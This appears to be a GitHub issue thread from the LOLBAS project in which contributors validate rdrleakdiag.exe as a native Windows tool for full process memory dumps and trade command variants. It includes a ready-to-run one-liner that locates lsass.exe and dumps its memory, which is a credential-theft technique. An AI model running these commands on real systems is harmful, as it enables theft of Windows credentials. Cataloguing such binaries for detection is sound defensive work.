Validate process dump method: rdrleakdiag.exe

[ConsciousHacker]

rdrleakdiag.exe /p <pid> /o <outputdir> /fullmemdmp /wait 1

Source: https://twitter.com/0gtweet/status/1299071304805560321?s=21

[gtworek]

Please do remember about "/snap" instead of "/wait 1" for subsequent dumps. I had some replies on twitter with an information it works only once, and "/snap" looks like a kind of solution for this.

[ConsciousHacker]

Will do, thanks for the information!

[gladiatx0r]

FYI, you can skip running "wait" for the first run, if you run enable first. This has the added benefit of working regardless of what was already run;

for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rdrleakdiag.exe -p %J -enable & sleep 1 & rdrleakdiag.exe -p %J -o c:\users\maximus\desktop\dumps -fullmemdmp -snap

I found the sleep was necessary to give the diagnostics engine/feature/module(?) time to start before running the dump.

[tsamuels-r7]

I just validated this process dump method. Please consider adding this native windows binary to the LOLBAS project.

C:\WINDOWS\system32>rdrleakdiag.exe /p <PID> /o <PATH> /fullmemdmp /snap

[noob-Engle]

winserver 2019 Copy execution not successful

[gtworek]

May work if you try again replacing "/wait 1" with "/snap" I have tested it on 10.0.17763.379.

[XiaoliChan]

May work if you try again replacing "/wait 1" with "/snap" I have tested it on 10.0.17763.379.

Well, both have already try, it didn't work.

[wietze]

#216 has added rdrleakdiag.exe, I'm closing this issue for now.